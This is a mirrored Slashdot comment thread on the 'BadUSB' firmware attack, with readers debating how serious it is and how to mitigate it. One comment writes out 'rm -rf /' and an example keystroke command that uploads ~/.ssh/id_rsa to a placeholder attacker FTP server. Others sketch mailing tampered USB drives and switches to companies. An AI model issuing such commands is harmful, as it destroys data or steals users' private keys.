Slashdot Mirror
"BadUSB" Exploit Makes Devices Turn "Evil"
An anonymous reader writes with a snippet from Ars Technica that should make you (even more) skeptical about plugging in random USB drives, or allowing persons unknown physical access to your computer's USB ports: When creators of the state-sponsored Stuxnet worm used a USB stick to infect air-gapped computers inside Iran's heavily fortified Natanz nuclear facility, trust in the ubiquitous storage medium suffered a devastating blow. Now, white-hat hackers have devised a feat even more seminal—an exploit that transforms keyboards, Web cams, and other types of USB-connected devices into highly programmable attack platforms that can't be detected by today's defenses. Dubbed BadUSB, the hack reprograms embedded firmware to give USB devices new, covert capabilities. In a demonstration scheduled at next week's Black Hat security conference in Las Vegas, a USB drive, for instance, will take on the ability to act as a keyboard that surreptitiously types malicious commands into attached computers. A different drive will similarly be reprogrammed to act as a network card that causes connected computers to connect to malicious sites impersonating Google, Facebook or other trusted destinations. The presenters will demonstrate similar hacks that work against Android phones when attached to targeted computers. They say their technique will work on Web cams, keyboards, and most other types of USB-enabled devices.
Here comes the digitially signed / encrypted usb dongles for USB 4.x, where every device has a firmware signature encrypted within the device and part of the usb handshake will be to read the entire firmware to re-calc the signature to make sure it matches, with a 3rd comparison via the internet to a usb device registry.
Then the criminals will figure out how to falsify the signature with the bad firmware anyway.
And everyone said that when Hardison would program USB sticks to type stuff and send all the data back to headquarters when they just plugged it in a computer that it was not real. It turns out he was just ahead of everyone else.
Peter predicted that you would "deliberately forget" creation 2000 years ago...
...with a 3rd comparison via the internet to a usb device registry.
That makes the whole concept dead on arrival. Anything that requires a connection is no damn good, aside from a remote terminal, I suppose
“He’s not deformed, he’s just drunk!”
and of course I re-read this and realize they meant also changing a webcam or keyboard to be malicious. Man I shouldn't post before my morning coffee.
nah. dunk your computer and USB device in holy water and it's good to go again.
Really? Because the worst I can imagine is the NSA or another spy agency getting a shipment of devices from the manufacturer so that when you get it delivered new and in the box it's already compromised. Your brand new shiny Dell or HP would be compromised from the factory.
Think I've not got enough layers of tinfoil? Google for "Cisco NSA routers".
At this point, if it can be exploited by these clowns, it will be.
Unless, of course, it's law enforcement who have done it.
Lost at C:>. Found at C.
The whole point of this is that the malware reprograms the firmware of existing, trusted devices to make them malicious.
I thought it was common sense not to plug in untrusted devices to your computer. Especially unknown thumb drives, unless you can use them in a read only device.
The problem at hand is that you can take a trustworthy device, plug it into an infected computer and then your trustworthy device becomes compromised and not easily detectably so, infecting your formerly clean PC. So far, no comments on mitigating procedures or OS specific circumstances. Most OSes will automatically load USB devices so in theory this could affect just about every OS whereby a compromised phone decides to become a keyboard and starts typing keystrokes and sending data to a 3rd party. Scary, at least in theory.
just ask the user whether they want that second keyboard, network card, or mouse attached. And a malicious DNS server is also not the thing that doesn't let me sleep at night -- https was designed for that.
Nah, we are already screwed beyond help.
This kind of attack is not new, the new part are the examples of generic devices with hacked firmware to do that. This can be solved easily requesting user autorization before activating any USB device type, for example, before telling the system that there is a new USB network device, ask the user for confirmation. The trick is with input devices, where the new device could be replacing a broken one (keyboard or mouse), the confirmation can be done requesting the user to type a code displayed on screen or using the mouse to use a on screen keyboard in order to accept the input device for general usage. The other problem is with devices permanently attached, assume that any attached device at boot time is trusted, If someone replaced your USB device when you weren't present other more awful things couls have been done.
I've heard about a few cases (which is a fancy way of saying, "I once heard a third-hand story, but am too lazy to fact check myself at the moment") of attackers leaving thumb drives in parking lots outside the buildings of offices they wanted to hack, as if the drives had been dropped out there by accident after slipping out of a pocket. Employees of the company inevitably found the drives, some of them kept the drives for personal use, and some of those drives eventually got plugged into computers inside the office. With AutoPlay settings and the like, it used to be fairly trivial for malware to enter an office that way.
Which is to say, if you find a USB drive in your company's parking lot, toss it in the trash if you can't find the original owner.
1. A ton of USB devices are actually implemented as general-purpose components with programmable firmware (attached to whatever support hardware, like a network card or a webcam, is necessary). So they're more common than you think.
2. Smartphones are an excellent reprogrammable USB device that lots of individuals have.
3. This is difficult enough to really engineer well that it is probably a bigger threat as a targeted attack against a big organization for now. Until someone does the engineering to make it easy to deploy widely. Then, it'll be a threat for everyone. Kind of like automated hacking of consumer-grade routers to modify the firmware to participate in an Internet-wide portscan. It's the Metasploit effect: it's not a big problem until someone makes it automated, then it is.
Just another reason why you shouldn't stick foreign objects in your orifices...
Or they could already come programmed from a "trusted" factory. It's not like that hasn't happened before. Yikes!
and of course I re-read this and realize they meant also changing a webcam or keyboard to be malicious. Man I shouldn't post before my morning coffee.
Let them try reprogramming a Model M keyboard. There is one perk to legacy PS/2 ports, they are secure!
OK, this makes a bit more sense than the MSM version I read half an hour ago. In that article, they made it sound like USB keyboards were spreading a virus by reprogramming the USB controller chips on motherboards, which sounded a bit too far fetched to me (maybe one brand could be vulnerable - but a widespread problem?). In the Ars story it sounds more like they are reprogramming the firmware in the USB device itself to act as a different device. Cute trick, possibly useful against a carefully chosen target, but the likelyhood of a widespread attack seems minimal. And auditing your devices would be quite easy - just keep an eye on what device types are showing up in /sys/bus/usb or device manager.
Smartphones is the big problem. People think it is acceptable to just plug them in everywhere to "just charge them".
I can go to a train-station or another reasonable public spot. Look for a power outlet and plug in my "charging station" that turn a smartphone into a malicious device.
This will infect devices from a very diverse group that will travel around and connect their devices to whatever USB-port they can find.
If you had the money/resources, you could create these things by the thousand and bulk-mail these to major companies. It would stand to reason that somebody would end up plugging them into their office computer, enabling a back door.
You could go even further and create hacked 5 port switches or access points and ship them off to big company branch offices, where users may be more likely to ignore standards or be short on resources and use those kinds of things anyway. You could put a return label on it for the office supply company or even the HQ office so that users thought it was something they had gotten by accident.
I'd bet in a lot of cases people would just say "sweet" and go ahead and use them in the office, giving you a back door. A switch or access point would have enough space inside that custom hardware could be inserted giving a lot better back door, like having your own computer on their network.
Wouldn't it be much simpler to make USB device firmware not upgradeable? When have you ever updated the firmware on a mouse or keyboard? If there's a legitmate need to leave them upgradeable, put in a jumper or switch that is off by default.
As far as I can tell from the article it's not "malware reprograms", it's "malicious third party with physicall acess to USB device reprograms".
Quite a bit of difference.
Yes, the "white-hat hackers" are Karsten Nohl and his gang. That's the guy behind the GSM hack. If he wants to know the algorithm that a smart card uses for encryption, he removes layer by layer of the chip and reconstructs the algorithm from the circuits. Nohl does not kid around. If he says it can be hacked, it can.
I would love to see malware that will reprogram a mask-programmed blob in a common throwaway hardware. Or a microcontroller in a webcam that doesn't even have the programming pins (typically some sort of ISP or JTAG) connected to anything USB accessible (or not even connected at all, at best to some test pads).
A typical USB stick or a webcam don't have hardware to permit firmware upgrades, even though the silicon inside could be theoretically upgradable. Not to mention that the exploit would have to be written specifically for the target hardware - different processors, memory layout, USB interface, etc - all that would make it really hard to produce a generic malware. If you want to see what is involved in something like that, look at the article on hacking HDD controllers:
http://spritesmods.com/?art=hd... And that is a harddrive, which are produced by only few manufacturers, have relatively standardized interfaces and controllers. Now imagine having to do that sort of reverse engineering on every type of harddrive in common use if you wanted to write a reasonably effective malware (e.g. a data stealing worm). It is much easier to exploit some Windows bug or use a phishing scam than this.
So yes, this is potentially a threat, but panicking over your USB sticks or webcams going rogue on you is vastly overblown. This could be an issue for a very targeted attack where the benefits of compromising e.g. a keyboard of a high value target will outweigh the effort required, but not really anything else. And that assumes that the keyboard is actually able to be updated! It would be probably simpler to just send an operative in and install e.g. a keylogger ...
Oh and they mention the "BadBios" story ... Nobody was ever able to confirm that apart from the original very confused researcher.
The best security in this case is if there were no PS/2 keyboard connected before, then it won't be recognised until the computer is shut down or rebooted.
If you use a Model M, you will probably even fry the PS/2 port - but an "evil" Model M would have a replacement micro-controller that wouldn't fry the port by drawing too much current, like keyboard from the 90s and 00s don't.
What they are talking about here infects on firmware/driver level initialization between USB device and computer when plugged in that is an inherent part of the USB standard, before and invisible to any user mode (software) inspection (and how do you plan to see/test that the usb firmware is not infected?). This is not your regular Windows auto-run type problem.
At the point where a hacker has physical access to one of your machines, you have bigger problems than whether they're going to swap out your mouse for something more easily hackable.
Bits of code, random ramblings: jakimfett.com
I'd be interested to see how well this works against linux workstations. Having the ability to arbitrarily send keyboard commands will only be effective if a) they're the correct key commands (eg, the shortcut to open the terminal client, or a web browser, which changes depending on your desktop environment) and you can actually *do* those commands. Eg, "rm -rf /" isn't going to work without the superuser password.
That said...something like "cd ~/.ssh;ftp attack@myserver.hack;put id_rsa;exit" wouldn't necessarily need any sort of high level access...and getting ahold of someone's private key is akin to getting the holy grail, especially if you can do it without them realizing it.
Bits of code, random ramblings: jakimfett.com
Depends.
I once worked for a company that wrote web banking software. The laptops/desktops/etc of certain employees had a 'driver' that continually monitored the USB ports. If anything plugged into it that had storage on it but not the proper corporate auth key to connect as an approved storage device? It would automatically send an email to the IT department, immediately shut off the entire USB subsystem in the OS, and it stayed that way until the device was re-imaged (in many cases making the device completely useless). It also got you immediately perp-walked out of the building and freshly unemployed, unless you could immediately give them a reasonable (and provable) explanation as to why it happened.
Now in this case, I suspect that if the bad stick presented itself to the OS as a keyboard/mouse/whatever, it may circumvent that (I say "may" because I don't know if it would be able to dump any non-keyboard/mouse-related data onto the machine w/o presenting itself as storage.)
Either way, if you're that worried about it, then epoxy the USB ports shut (well, except on the phone for obvious reasons...)
Quo usque tandem abutere, Nimbus, patientia nostra?
...except that plenty of people, even those who should know better, are willing to accept a free flash drive.
And that flash drive also is a HID device, and it's going to sometimes send a series of keystrokes that issue command you don't like.
This entire hack depends on a device that looks like a keyboard, not being a keyboard, but being a keyboard AND a network card - or a flash drive that's ALSO a HID device - or a webcam that's also a BT receiver.
Are you:
* A bank?
* A utility?
* A large corporation?
* A defense contractor?
* A military?
* A government?
* A "whistlebower" (in the figurative sense, not someone who just blows a literal whistle)?
* A journalist?
* A civil rights/government abuse/environmental/economic activist?
* Are you a member of an "anti-government" group or movement?
* Are you Muslim?
* Are you or have you ever been brown?
* Now or will you in the future travel through a customs inspection area of any country?
* Under active investigation by a law enforcement agency?
* A rabble-rouser?
* A person with opinions that are counter to those of your government?
* A sentient artificial lifeform?
If you answered yes to any of the above, then yes you need to be worried. If you did not, then no, you probably don't need to be worried.
I browse on +1 so AC's need not respond, I won't see it.
I bet at least 20% of the USB devices use the same FTDI chip for USB functionality, and another 20% use Atmel AVR microcontrollers. If your malware patched or replaced the Atmel firmware, you could own a lot if systems.
It wouldn't even NEED to continue to work like the original device, so you could just replace the firmware with the Atmel firmware I wrote last night. The user plugs in their webcam or tries to turn it on. The webcam doesn't work anymore. The bad guy doesn't care, at that point he has already owned the machine, just a few seconds after the device was plugged in.
How uninformed you are!
https://forums.hak5.org/index.php?/topic/8630-collection-of-production-tools-for-usb-devices/ is a discussion of "production tools" for USB flash drives.
These tools are specific to the controller in the flashdrive (chipsbank, micov, etc) and allow you to do things like change what size the drive reports itself as, load files onto the thing and make it behave as a read-only flash drive, load files on and make it behave as a USB CD/DVD-ROM drive with a disk preloaded, make it behave as a single flashdrive with multiple partitions, make it come up on the USB bus as a compound device consisting of any combination of the above.
My company uses these sorts of tools to distribute software on read-only flashdrives.
Negative, I am a meat popsicle.
"If anything plugged into it that had storage on it ... It also got you immediately perp-walked out of the building and freshly unemployed,"
Nice opportunity to get rid of a co-worker when he's away for a bathroom break...
Avantslash: low-bandwidth mobile slashdot.
I eat Cheetos, you insensitive clod!
Bits of code, random ramblings: jakimfett.com